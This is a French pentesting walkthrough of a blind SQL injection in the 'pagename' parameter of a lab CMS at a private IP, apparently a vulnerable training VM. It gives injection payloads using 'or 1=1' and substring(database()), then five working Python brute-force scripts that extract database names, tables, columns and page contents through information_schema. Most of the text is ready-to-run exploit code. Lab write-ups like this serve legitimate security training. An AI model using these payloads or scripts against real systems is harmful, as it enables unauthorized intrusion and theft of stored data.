SQLI (pagename) - Pentesting Web

Vulnérabilité SQL Injection:

Détection d'une Vulnérabilité SQL Injection

En ajoutant une apostrophe dans le champ "home", une erreur SQL apparaît, indiquant une possible vulnérabilité à une attaque SQL injection.

Exploitation de la Vulnérabilité SQL Injection

En introduisant l'injection SQL /cms.php?pagename=home' or '1'='1, aucune erreur n'apparaît, confirmant la vulnérabilité.

Extraction du Nom de la Base de Données avec Substring

Maintenant, avec ce point d'entrée, nous utilisons le paramètre "substring" pour trouver les caractères du nom de la base de données, en introduisant des lettres jusqu'à ce qu'il n'y ait plus d'erreurs. Voici un exemple pour les trois premiers caractères :

Première lettre : /cms.php?pagename=home' or substring(database(),1,1)='a
Deuxième lettre : /cms.php?pagename=home' or substring(database(),2,1)='d
Troisième lettre : /cms.php?pagename=home' or substring(database(),3,1)='m

D'abord, un script Python peut automatiser tout le processus pour obtenir le nom de la base de donnée.

#!/usr/bin/python3
from pwn import *
import requests, signal, sys, time, string

def def_handler(sig, frame):
    print("\n\n[!] Exiting...\n")
    sys.exit(1)

#Ctrl +c 
signal.signal(signal.SIGINT, def_handler)

#Global Variables
characters = string.ascii_lowercase
main_url = "http://192.168.71.140/imfadministrator/cms.php?pagename="


def sqli():
    headers = {
        'Cookie': 'PHPSESSID=g2dt1a46m4f3qmgnfcuev3qts3'
    }

    data = ""

    p1 = log.progress("SQLI")
    p1.status("Starting SQL injection...")
    time.sleep(2)

    p2 = log.progress("Data")

    for position in range(1, 6 ):
        for character in characters:
            sqli_url = main_url + "home' or substring(database(),%d,1)='%s" % (position, character)
            r = requests.get(sqli_url, headers=headers)

            if "Welcome to the IMF Administration." not in r.text:
                data += character 
                p2.status(data)
                break
    p1.success("Brute force SQLI concluded")
    p2.success(data)
if __name__ == '__main__':
    sqli()

Ensuite, un script Python pour automatiser tout le processus pour obtenir les noms de toutes les bases de données.

#!/usr/bin/python3

from pwn import *
import requests, signal, sys, time, string

def def_handler(sig, frame):
    print("\n\n[!] Exiting...\n")
    sys.exit(1)

#Ctrl +c 
signal.signal(signal.SIGINT, def_handler)

#Global Variables
characters = string.ascii_lowercase + "_,:" + string.digits
main_url = "http://192.168.71.140/imfadministrator/cms.php?pagename="


def sqli():
    headers = {
        'Cookie': 'PHPSESSID=g2dt1a46m4f3qmgnfcuev3qts3'
    }

    data = ""

    p1 = log.progress("SQLI")
    p1.status("Starting SQL injection...")
    time.sleep(2)

    p2 = log.progress("Data")

    for position in range(1, 100):
        for character in characters:
            sqli_url = main_url + "home' or substring((select group_concat(schema_name) from information_schema.schemata),%d,1)='%s" % (position, character)
            r = requests.get(sqli_url, headers=headers)

            if "Welcome to the IMF Administration." not in r.text:
                data += character 
                p2.status(data)
                break
    p1.success("Brute force SQLI concluded")
    p2.success(data)
if __name__ == '__main__':
    sqli()

Maintenant, un script Python pour automatiser tout le processus pour obtenir le nom des tableaux de la bases de donnée (admin).

#!/usr/bin/python3

from pwn import *
import requests, signal, sys, time, string

def def_handler(sig, frame):
    print("\n\n[!] Exiting...\n")
    sys.exit(1)

#Ctrl +c 
signal.signal(signal.SIGINT, def_handler)

#Global Variables
characters = string.ascii_lowercase + "_,:" + string.digits
main_url = "http://192.168.71.140/imfadministrator/cms.php?pagename="


def sqli():
    headers = {
        'Cookie': 'PHPSESSID=g2dt1a46m4f3qmgnfcuev3qts3'
    }

    data = ""

    p1 = log.progress("SQLI")
    p1.status("Starting SQL injection...")
    time.sleep(2)

    p2 = log.progress("Data")

    for position in range(1, 100):
        for character in characters:
            sqli_url = main_url + "home' or substring((select group_concat(table_name) from information_schema.tables where table_schema='admin'),%d,1)='%s" % (position, chara
cter)
            r = requests.get(sqli_url, headers=headers)

            if "Welcome to the IMF Administration." not in r.text:
                data += character 
                p2.status(data)
                break
    p1.success("Brute force SQLI concluded")
    p2.success(data)

if __name__ == '__main__':
    sqli()

Maintenant, un script Python pour automatiser tout le processus pour obtenir le nom des colonnes de la bases de donnée (admin).

#!/usr/bin/python3

from pwn import *
import requests, signal, sys, time, string

def def_handler(sig, frame):
    print("\n\n[!] Exiting...\n")
    sys.exit(1)

#Ctrl +c 
signal.signal(signal.SIGINT, def_handler)

#Global Variables
characters = string.ascii_lowercase + "_,:" + string.digits
main_url = "http://192.168.71.140/imfadministrator/cms.php?pagename="


def sqli():
    headers = {
        'Cookie': 'PHPSESSID=g2dt1a46m4f3qmgnfcuev3qts3'
    }

    data = ""

    p1 = log.progress("SQLI")
    p1.status("Starting SQL injection...")
    time.sleep(2)

    p2 = log.progress("Data")

    for position in range(1, 100):
        for character in characters:
            sqli_url = main_url + "home' or substring((select group_concat(column_name) from information_schema.columns where table_schema='admin' and table_name='pages'),%d,1
)='%s" % (position, character)
            r = requests.get(sqli_url, headers=headers)

            if "Welcome to the IMF Administration." not in r.text:
                data += character 
                p2.status(data)
                break
    p1.success("Brute force SQLI concluded")
    p2.success(data)

if __name__ == '__main__':
    sqli()

Maintenant, un script Python pour automatiser tout le processus pour obtenir le contenue de la colonne pagename de bases de donnée (admin).

#!/usr/bin/python3

from pwn import *
import requests, signal, sys, time, string

def def_handler(sig, frame):
    print("\n\n[!] Exiting...\n")
    sys.exit(1)

#Ctrl +c 
signal.signal(signal.SIGINT, def_handler)

#Global Variables
characters = string.ascii_lowercase + "$%-/_,;:" + string.digits
main_url = "http://192.168.71.140/imfadministrator/cms.php?pagename="


def sqli():
    headers = {
        'Cookie': 'PHPSESSID=g2dt1a46m4f3qmgnfcuev3qts3'
    }

    data = ""

    p1 = log.progress("SQLI")
    p1.status("Starting SQL injection...")
    time.sleep(2)

    p2 = log.progress("Data")

    for position in range(1, 500):
        for character in characters:
            sqli_url = main_url + "home' or substring((select group_concat(pagename) from pages),%d,1)='%s" % (position, character)
            r = requests.get(sqli_url, headers=headers)

            if "Welcome to the IMF Administration." not in r.text:
                data += character 
                p2.status(data)
                break
    p1.success("Brute force SQLI concluded")
    p2.success(data)

if __name__ == '__main__':
    sqli()

Mis à jour il y a 12 mois

Ce contenu vous a-t-il été utile ?